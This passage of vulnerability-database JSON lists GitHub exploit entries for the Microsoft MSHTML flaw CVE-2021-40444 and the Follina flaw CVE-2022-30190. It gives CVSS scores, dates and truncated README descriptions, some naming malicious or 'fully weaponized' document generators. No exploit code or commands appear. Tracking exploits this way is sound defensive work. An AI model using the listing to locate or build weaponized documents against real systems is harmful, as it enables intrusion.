"published": "2021-09-15T22:34:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-31T01:08:02", "id": "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:37", "description": "# CVE-2021-40444-URL-Extractor\n\nPython script to extract embedde...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T16:54:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T19:01:48", "id": "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:09", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-22T13:29:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-22T13:41:39", "id": "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-26T03:16:25", "description": "# CVE-2021-40444-POC\nAn attempt to reproduce Microsoft MSHTML Re...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T14:55:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-26T02:46:54", "id": "8B907536-B213-590D-81B9-32CF4A55322E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:21:49", "description": "# Microsoft-Office-Word-MSHTML-Remote-Code-Exe...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-19T08:16:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:49:48", "id": "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:48", "description": "# TIC4301_Project\nTIC4301 Project - CVE-2021-40444\n\nDownload the...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-16T07:07:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-06T13:36:02", "id": "111C9F44-593D-5E56-8040-615B48ED3E24", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:29", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": 
{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T20:32:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-18T19:46:25", "id": "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-24T07:50:01", "description": "# CVE-2021-40444_CAB_archives\nCVE-2021-40444 - Custom CAB templa...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-24T10:59:34", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T00:43:34", "id": "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:25", "description": "# CVE-2021-40444 docx Generate\ndocx generating to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T05:31:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-14T23:45:35", "id": "0990FE6E-7DC3-559E-9B84-E739872B988C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, 
"privateArea": 1}, {"lastseen": "2023-06-05T05:19:33", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-05T02:27:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T02:29:52", "id": "1934A15D-9857-5560-B6CA-EA6A2A8A91F8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:32", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-28T06:33:25", 
"type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-28T09:38:18", "id": "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-09T21:51:56", "description": "# Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T08:32:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-40444"], "modified": "2022-01-09T21:16:38", "id": "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:16:33", "description": "# Follina-CVE-2022-30190-Sample-by-ethical-blue\n Educational Fol...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-25T16:27:59", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-01T22:51:35", "id": "FB757D3A-A896-5AB5-B72B-7C880581D12E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:39:26", "description": "# Follina-CVE-2022-30190-Unofficial-patch-\nAn Unofficial Patch F...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-13T04:20:02", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:22", "id": "56417A88-33CB-520F-8FC3-4F3E49561DDC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:37:06", "description": "# CVE-2022-30190_EXP_PowerPoint\n\nThis is exploit of CVE-2022-301...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-29T08:48:12", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:49", "id": "705BFDF7-98C8-5300-AB18-E9EEE465AE5F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-23T20:04:43", "description": "# CVE-2022-30190\n**S...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-23T15:24:43", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-23T15:34:15", "id": "E917FE93-F06C-5F70-915F-A5F48A30B044", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:36:33", "description": "<h1 align='center'><b> 
Follina-attack-CVE-2022-30190-</b></h1><b...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-06T11:41:43", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-06T15:42:31", "id": "E7177DCC-97D5-5A91-8A06-124DD3CB9739", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:11:20", "description": "# Follina Proof of Concept (CVE-2022-30190)\n\nQuick and easy \"pro...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T10:47:57", "type": "githubexploit", "title": "Exploit for 
Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-17T17:01:27", "id": "02FCE52D-5E91-5C57-A40A-DE4FF7C726A3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:07:04", "description": "# follina (POC)\nAll about CVE-2022-30190, aka follina, that is a...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-03T00:25:37", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-08-04T05:23:21", "id": "221070D3-0B31-5CF7-A508-B4740B63647B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:57:47", "description": "# FollinaExtractor\nExtract ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T02:22:53", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-04-08T01:53:55", "id": "675E960A-9F2E-5575-8C21-8528492BE5C6", "href": "", "cvss": 